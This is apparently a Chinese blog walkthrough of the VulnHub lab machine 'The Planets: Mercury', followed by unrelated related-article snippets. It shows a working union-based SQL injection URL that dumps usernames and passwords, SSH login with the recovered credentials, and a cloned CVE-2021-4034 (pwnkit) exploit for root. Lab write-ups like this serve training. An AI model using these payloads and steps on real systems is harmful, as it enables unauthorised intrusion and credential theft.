vulnhub靶场——THE PLANETS: MERCURY

news/2024/11/25 7:53:53/

THE PLANETS:MECURY

准备

攻击机: kali
靶机: THE PLANETS:MECURY NAT 192.168.91.0 网段
下载连接:
https://www.vulnhub.com/entry/the-planets-mercury,544/
测试发现无法正常获取IP,因此进入拯救模式修改网卡配置文件。
开机长按 shift 显示如下画面:
01
在当前画面按 e
02
如图所示,将 ro quiet 跟改为 : rw signie init=/bin/bash
03
然后按 ctrl + x 进入系统进入系统,输入: lsb_release -a 系统发行版本04
如图所示为 Ununtu 20.0.4, 众所周知,Ubunut 新版本中修改IP地址配置文件为 /etc/netplan/*** (*** 根据实际情况文件名称是什么就是什么)先查看网卡名称
05
为 ens33,现在修改配置文件
vi /etc/netplan/00-installer-config.yaml
请添加图片描述
如图所示将 原本错误的网卡名称跟改为 ens33, 这里已经修改完成。现在只需重启linux 正常启动即可。
请添加图片描述

信息搜集与利用

主机发现

请添加图片描述
如图所示得到了目标靶机的IP地址: 192.168.91.172

端口扫描

nmap -sV -p- -A -sS 192.168.91.172 -oN nmap_mercury.txt

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-09 17:05 CST
Nmap scan report for 192.168.91.172
Host is up (0.00092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

仔细查看扫描结果,只开放了 22,8080两个端口,其中 8080 为 python 3.8构成的页面。
http://192.168.91.172:8080/
请添加图片描述
尝试是否开启了 DEBUG,随便构造一个错误的url即可
请添加图片描述
如图所示可以断定为 Django 开发的网页,存在的 路由有: robots.txt ,mercuryfacts/, 访问它们,同时扫一下目录

目录扫描

dirb http://192.168.91.172:8080/
默认只能扫描出 robots.txt 然而 robots.txt协议什么都没有
访问:
http://192.168.91.172:8080/mercuryfacts/
请添加图片描述
如图所示显示出了 水星?
进入 Load a fact 页面显示如下
http://192.168.91.172:8080/mercuryfacts/1/
请添加图片描述
如图所示,注意数字1,经过测试1-8可以显示内容,猜测存在sql注入,验证:
http://192.168.91.172:8080/mercuryfacts/1’/
请添加图片描述
如上报错,则证明sql 注入存在。经过测试得到如下内容:
http://192.168.91.172:8080/mercuryfacts/44%20union%20select%20group_concat(username,0x2d,password)%20from%20users/

请添加图片描述
得到了几个用户名和密码。那么尝试能否 ssh 登陆。
经测试发现最后一个用户 webmaster-mercuryisthesizeof0.056Earths ssh 登陆成功
请添加图片描述
信息搜集
请添加图片描述
如图所示:在当前目录下存在第一个flag
cat /etc/passwd | grep "/bin.bash"
如图所示:除了 root 用户外,另有三个用户具有 /bin/bash 分别是: mercury,webmaster(当前登陆用户),linuxmaster。

flag 1

请添加图片描述
[user_flag_8339915c9a454657bd60ee58776f4ccd]

根据老套路,最后一个 flag 一般在 root 目录下,因此需要提权
在 mercury_proj/notes.txt 有如下内容
请添加图片描述
如图所示很明显:linuxmaster 为之后要切换的用户,其密码为 base64编码 bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== 将其解码得到:
mercurymeandiameteris4880km

因此得到用户名和密码: linuxmaster:mercurymeandiameteris4880km

切换用户到 linuxmaster
请添加图片描述
如图所示切换成功。

SUID提取

find / -perm -u=s -type f 2>/dev/null
请添加图片描述
经过搜索发现 最后一个即红框中的内容存在提权漏洞,而且是去年才曝光的漏洞:
CVE-2021-4034
git clone https://github.com/berdav/CVE-2021-4034
请添加图片描述
进入 CVE-2021-4034 文件夹然后执行 make 命令
请添加图片描述
将生成 cve-2021-4034 可执行文件,直接运行即可
./cve-2021-4034
请添加图片描述
如图所示成功提权,拿到 root 权限,现在找root 目录下的 flag即可
请添加图片描述
如图所示拿到了 flag, 这个系列靶机挺有意思的。

总结:

  1. sql 注入
  2. cve-2021-4034

http://www.ppmy.cn/news/515309.html

相关文章

QTP/UFT 自动化测试浅谈1-模拟键盘Mercury.DeviceReplay

想来在公司已经做了一年半自动化测试了&#xff0c;现在归纳一下 有时需要QTP模拟用户进行键盘输入或者鼠标操作&#xff0c;Mercury.DeviceReplay这个类很好的解决了这个问题 1&#xff09;实现复选List或者Table时&#xff0c;需要配合按下Ctrl键 Set oDevice CreateObje…

设置Mercury水星路由器的无线网络

软件环境&#xff1a;win7360浏览器   硬件环境&#xff1a;笔记本Mercury路由器2根网线   一、测试宽带账号能否使用。   1、用网线将PC机 与墙上的网络端口直接相连&#xff1b;   2、点击win7桌面右下角的网络标识 –》点击”打开网络与共享中心” –》“设置新…

靶机渗透练习82-The Planets:Mercury

靶机描述 靶机地址&#xff1a;https://www.vulnhub.com/entry/the-planets-mercury,544/ Description Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This …

水星路由器 Mercury MER1200G刷机教程,Archer C5V4刷回原厂固件,串口(TTL)刷机,需要一个USB转TTL工具

1、 准备工作&#xff1a; 硬件工具&#xff1a; 1、USB转TTL CH340模块 2、2.54mm间距4P单排排针 以上东西网上购买即可&#xff0c;2个加起来不到5块钱&#xff0c;还包邮。 软件工具&#xff1a; 1、sscom5.13.exe 2、tftpd32.exe 3、路由器原厂固件 文件下载地址&#…

高性能网络通信框架--Mercury

Mercury是一个专门设计用于HPC系统的RPC框架&#xff0c;允许异步传输参数和执行请求&#xff0c;以及直接支持大型数据参数。网络实现是抽象的&#xff0c;允许轻松移植到未来系统&#xff0c;并有效使用现有的本地传输机制。Mercury的接口是通用的&#xff0c;允许对任何函数…

Mercury.DeviceReplay对象实现鼠标、键盘模拟操作

这里介绍一下Mercury.DeviceReplay这个对象&#xff0c;来实现对鼠标、键盘的模拟操作&#xff0c;它是一个很实用的对象&#xff0c;但QTP帮助文档中对几乎没有此介绍。 这个对象用来模拟鼠标的单击和移动、键盘输入等&#xff0c;但有个前提&#xff0c;实用该对象前&#x…

mercury已断开服务器无响应,mercury无线网卡驱动插上没反应怎么办-插上没反应的解决办法...

原创mercury无线网卡驱动插上没反应怎么办-插上没反应的解决办法 编辑:小禾 来源:互联网 时间:2020-10-15 09:58:00 有的朋友在使用mercury无线网卡驱动时&#xff0c;发现插上没反应&#xff0c;该怎么办呢?那么下面小编就和大家一起分享mercury无线网卡驱动插上没反应的解决…

mercury已断开服务器无响应,Mercury水星无线路由器无法上网解决办法 | 192路由网...

本文解决的问题:电脑连接水星(mercury)无线路由器,并在水星无限路由器设置了上网账号,但是仍然不能够上网的问题。这个问题的原因比较多,下面来介绍一些常见的原因的引起的使用水星无限路由器无法上网的问题。 我们先来把问题细分化,先确定是水星无线路由器与宽带之间的问…